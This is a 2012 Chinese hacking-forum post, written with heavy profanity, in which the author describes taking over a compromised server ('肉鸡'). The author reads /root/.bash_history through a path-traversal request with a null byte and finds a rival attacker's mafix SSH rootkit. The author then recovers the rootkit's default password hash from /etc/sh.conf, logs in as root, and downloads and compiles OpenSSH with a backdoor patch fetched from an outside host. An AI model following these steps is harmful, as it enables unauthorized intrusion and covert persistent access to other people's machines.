切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
376 一次检测Rootkit的肉鸡[复制链接]
发表于 2012-12-20 00:51:58 | 显示全部楼层 |!read_mode!
Yaseng 发了个包含给我  ROOT权限运行与HTTPD 如下图


傻逼 草拟吗的嫩B  什么J8管理员 ROOT权限的HTTPD? 这不明摆着找日吗? 草拟吗B的傻逼

打算破HASH  没CPU  GUP


好吧 这傻逼货 继续看  NAMP扫了下 我了个擦 貌似有个傻逼黑客装个后门



啃跌了 什么年代了 还用sshd v1  你特么不是丢人吗??  链接测试

  • brk<~> $ ssh root@xxoo -1  # 22端口的SSH
  • Protocol major versions differ: 1 vs. 2
  • brk<~> $ ssh root@xxoo -p 2010 -1  # 2012端口的SSH  低级版本 怀疑后门
  • root@xxoo’s password:


估计是傻逼mafix SSH backdoor   下载了微观下
http://lucky.fuzzexp.org/file/r00tk1t/mafix.tar_shit.gz看到SSHDIR=/lib/libsh.so   包含读了下 果然是这个傻逼后门

下面确定了 找密码吧~~首先看ROOT的日志
1,GET /sc8/photodownload?filepath=../../../../../../../../../../../root/.bash_history%00.html HTTP/1.1

读了下 找不到 估计被-c了分析ROOTKIT的源代码  看看密码如何处理的
  • brk<~/Desktop/ddrk> $ head setup
  • #!/bin/bash
  • ##########define variables##########
  • DEFPASS=123456
  • DEFPORT=43958
  • BASEDIR=`pwd`
  • SSHDIR=/lib/libsh.so
  • HOMEDIR=/usr/lib/libsh


变量是  DEFPASS
查找
  • brk<~/Desktop/ddrk> $ cat setup | grep DEFPASS
  • DEFPASS=123456
  •    echo “No Password Specified, using default – $DEFPASS”
  •    echo -n $DEFPASS|md5sum > /etc/sh.conf
  • brk<~/Desktop/ddrk> $


村在了  /etc/sh.conf  MD5加密 啃跌啊 读一下 果然出来了

你妈个BB 接着MD5 解密 。。。


成功登录


接下来  删除黑客的后门 留我自己的后门 如下  安装OPENSSH的吧。。
  •   [root@SH-crew:/root]# ssh -v
  • OpenSSH_4.3p2, OpenSSL 0.9.8e-fips-rhel5 01 Jul 2008
  • usage: ssh [-1246AaCfgkMNnqsTtVvXxY] [-b bind_address] [-c cipher_spec]
  •            [-D [bind_address:]port] [-e escape_char] [-F configfile]
  •            [-i identity_file] [-L [bind_address:]port:host:hostport]
  •            [-l login_name] [-m mac_spec] [-O ctl_cmd] [-o option] [-p port]
  •            [-R [bind_address:]port:host:hostport] [-S ctl_path]
  •            [-w tunnel:tunnel] [user@]hostname [command]
  • [root@SH-crew:/root]#


下载源代码。。

  • [root@SH-crew:/root]# cd /tmp/
  • [root@SH-crew:/tmp]# mkdir …
  • [root@SH-crew:/tmp]# cd …
  • [root@SH-crew:/tmp/...]# wget http://64studio.hivelocity.net/a ... h_4.3p2.orig.tar.gz
  • [root@SH-crew:/tmp/...]# tar xf openssh_4.3p2.orig.tar.gz
  • [root@SH-crew:/tmp/...]# cd openssh-4.3p2/
  • [root@SH-crew:/tmp/.../openssh-4.3p2]# wget http://lucky.fuzzexp.org/file/r0 ... tch/sshbd5.5p1.diff
  • [root@SH-crew:/tmp/.../openssh-4.3p2]# patch < sshbd5.5p1.diff
  • patching file auth.c
  • Hunk #1 succeeded at 243 (offset -28 lines).
  • patching file auth-passwd.c
  • Hunk #1 succeeded at 113 (offset -9 lines).
  • patching file canohost.c
  • Hunk #1 succeeded at 60 (offset -18 lines).
  • patching file includes.h
  • Hunk #1 succeeded at 211 (offset 39 lines).
  • patching file sshconnect2.c
  • Hunk #1 succeeded at 736 with fuzz 2 (offset -80 lines).
  • patching file sshlogin.c
  • Hunk #1 succeeded at 112 (offset -21 lines).
  • [root@SH-crew:/tmp/.../openssh-4.3p2]#



接下来编辑了下密码  和SSH登录登出的记录文件 编译

  • [root@SH-crew:/tmp/.../openssh-4.3p2]# ./configure –prefix=/usr –sysconfdir=/etc/ssh
  • [root@SH-crew:/tmp/.../openssh-4.3p2]# make && make install



重启 退出 登录SSH

  • [root@SH-crew:/tmp/.../openssh-4.3p2]# nano /etc/ssh/sshd_config
  • [root@SH-crew:/tmp/.../openssh-4.3p2]# nano /etc/ssh/ssh_config
  • [root@SH-crew:/tmp/.../openssh-4.3p2]# /etc/init.d/sshd restart
  • [root@SH-crew:/tmp/.../openssh-4.3p2]exit



然后登录 22 输入后门密码Helenv5吧傻逼黑客的后门删除了 哈哈哈
  • [root@viewjpkc libsh]# chmod -R 000 *
  • [root@viewjpkc libsh.so]# chmod -R 000 *


吧端口封了

  • [root@viewjpkc libsh]#  iptables -I INPUT -j DROP -p tcp –dport 2010
  • [root@viewjpkc libsh]# iptables-save



测试链接

  • brk<~/files/ssh> $ nc -vv xxxxxxxxxxx   2010
  • Connection to xxoo 2010 port [tcp/search] succeeded!
  • SSH-1.5-2.0.13
  • ^C
  • brk<~/files/ssh> $ nc -vv xxxxxx   2010



链接不了了

吧MOD删除了 别问我咋知道的   傻逼RK一般只用这个

[root@viewjpkc libsh]# modprobe -r ehci-hcd

最后 发张图。。。。








附件: 你需要登录才可以下载或查看附件。没有帐号?加入Team
操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2019-12-14 11:10

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部